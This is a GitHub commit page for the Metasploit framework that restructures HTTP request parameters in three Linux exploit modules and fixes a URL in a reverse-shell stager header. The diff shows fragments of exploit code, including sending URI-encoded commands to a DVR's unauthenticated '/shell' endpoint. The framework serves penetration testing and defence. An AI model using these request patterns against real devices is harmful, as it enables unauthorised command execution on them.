Skip to content

Commit 01ea526

Browse files
committed
Land rapid7#8070, msftidy vars_get fixes
2 parents 437cba8 + 5c436f2 commit 01ea526

File tree

4 files changed

+10
-5
lines changed

4 files changed

+10
-5
lines changed

modules/exploits/linux/http/mvpower_dvr_shell_exec.rb

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -60,7 +60,9 @@ def check
6060
begin
6161
fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
6262
res = send_request_cgi(
63-
'uri' => "/shell?echo+#{fingerprint}",
63+
'method' => 'GET',
64+
'uri' => '/shell',
65+
'query' => "echo+#{fingerprint}",
6466
'headers' => { 'Connection' => 'Keep-Alive' }
6567
)
6668
if res && res.body.include?(fingerprint)
@@ -75,7 +77,8 @@ def check
7577
def execute_command(cmd, opts)
7678
begin
7779
send_request_cgi(
78-
'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
80+
'uri' => '/shell',
81+
'query' => Rex::Text.uri_encode(cmd, 'hex-all'),
7982
'headers' => { 'Connection' => 'Keep-Alive' }
8083
)
8184
rescue ::Rex::ConnectionError

modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -104,7 +104,8 @@ def execute_command(cmd, opts)
104104
def check
105105
begin
106106
res = send_request_cgi({
107-
'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
107+
'method' => 'GET',
108+
'uri' => '/globe'
108109
})
109110
rescue ::Rex::ConnectionError
110111
vprint_error("#{peer} - A connection error has occured")

modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -98,7 +98,8 @@ def exploit
9898
@cookie = rand_text_alpha_lower(7)
9999

100100
res = send_request_cgi({
101-
'uri' => '/cgi-bin/index.asp?' + Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}"),
101+
'uri' => '/cgi-bin/index.asp',
102+
'query' => Rex::Text.encode_base64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}"),
102103
'method' => 'POST',
103104
'cookie' => "SESSIONID=#{@cookie}",
104105
'vars_post' => {

modules/payloads/stagers/python/reverse_tcp_ssl.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
##
2-
# This module requires Metasploit: http//metasploit.com/download
2+
# This module requires Metasploit: https://www.metasploit.com/download
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

0 commit comments

Comments
 (0)